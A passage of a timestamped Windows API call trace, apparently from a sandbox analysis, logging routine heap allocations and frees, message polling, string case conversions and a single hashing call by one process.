dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0206.792] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.792] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.792] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0206.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.792] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.792] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0206.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.793] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.793] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.793] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.793] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.793] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.793] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.793] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.794] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.794] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.794] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.794] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.794] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0206.794] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.794] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0206.794] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.794] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.794] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.794] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0206.794] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.795] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.795] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.795] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.795] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0206.795] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.795] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.795] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.795] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.795] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.795] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.795] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.795] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.795] CryptHashData (hHash=0xaa5820, pbData=0x24b1758, dwDataLen=0x3, dwFlags=0x1) returned 1 [0206.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0206.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0206.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0206.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0206.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0206.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0206.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0206.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0206.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0206.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0206.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0206.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0206.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0206.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0206.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0206.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0206.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0206.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0206.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0206.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0206.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0206.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0206.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0206.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0206.800] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0206.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0206.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0206.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0206.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0206.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0206.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0206.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0206.801] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0206.801] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0206.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0206.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0206.802] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0206.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.802] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0206.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.803] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0206.803] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0206.803] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0206.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0206.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0206.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 